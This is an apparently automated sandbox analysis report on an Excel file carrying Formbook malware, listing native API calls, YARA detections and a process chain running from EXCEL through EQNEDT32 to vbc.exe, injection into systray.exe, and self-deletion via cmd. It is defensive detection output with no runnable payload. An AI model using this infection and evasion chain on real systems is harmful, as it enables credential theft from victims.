          Source: C:\Windows\SysWOW64\systray.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D60 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E10 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E90 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D5A NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419DB2 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E0A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E8A NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D07AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CF938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008D1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008CFF34 NtQueueApcThread,
          Source: C:\Windows\explorer.exeCode function: 6_2_02979A32 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FC0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FBFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9E90 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9D5A NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9DB2 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000D9E8A NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B9DAE NtResumeThread,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E2148
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E1BA0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E9C72
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E1E90
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E3AD9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004E3AE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D810
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401026
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D1C8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DB06
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041E5D7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409DFA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DFD6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00981238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009863BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009063DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E2305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E7353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F1489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00915485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00926540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E4680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00982622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009157C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097F8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008EC85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E29B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F69FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00965955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00993A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0098CBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096DBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00907B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0097FDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00910D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008ECD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00912E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008FEE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008F0F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0090DF7C
          Source: C:\Windows\explorer.exeCode function: 6_2_02979A32
          Source: C:\Windows\explorer.exeCode function: 6_2_02971CF2
          Source: C:\Windows\explorer.exeCode function: 6_2_02971CEC
          Source: C:\Windows\explorer.exeCode function: 6_2_02970072
          Source: C:\Windows\explorer.exeCode function: 6_2_02978862
          Source: C:\Windows\explorer.exeCode function: 6_2_0297CA6F
          Source: C:\Windows\explorer.exeCode function: 6_2_02970069
          Source: C:\Windows\explorer.exeCode function: 6_2_02974B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0297CB0E
          Source: C:\Windows\explorer.exeCode function: 6_2_02977132
          Source: C:\Windows\explorer.exeCode function: 6_2_02974B22
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02071238
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FCE0C6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0201A37B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FE905A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_020763BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD3040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FFD005
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FF63DB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FCF3CF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD7353
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD2305
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FCE2E9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FEC5F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02072622
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0201A634
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD351F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FE1489
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0205579A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_020057C3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FDC7BC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0200D47D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02005485
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FDE6C1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02016540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD4680
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FE69FE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FD29B2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02083A83
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FF286D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FDC85C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0207CBA4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0205DBDA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FCFBD7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0206F8EE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FF7B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02055955
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0207098E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02002E2F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FDCD5B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0206CFB1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FFDF7C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FE0F3F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_02000D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_01FEEE4C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_0206FDDD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DE5D7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000C2D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000C9DFA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000C9E40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000C2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_000DDFD6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B9862
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B1069
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B1072
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B8132
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022BAA32
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022BDA6F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B5B22
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022BDB0E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B5B1F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B2CEC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 7_2_022B2CF2
          Source: RAPID SOA.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DDF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008DE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0094F970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00923F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092373B appears 238 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 02013F92 appears 132 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0201373B appears 244 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 01FCE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 01FCDF5C appears 119 times
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0203F970 appears 84 times
          Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: winlog[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@5/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RAPID SOA.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR869.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RAPID SOA.xlsxReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: RAPID SOA.xlsxStatic file information: File size 2211328 > 1048576
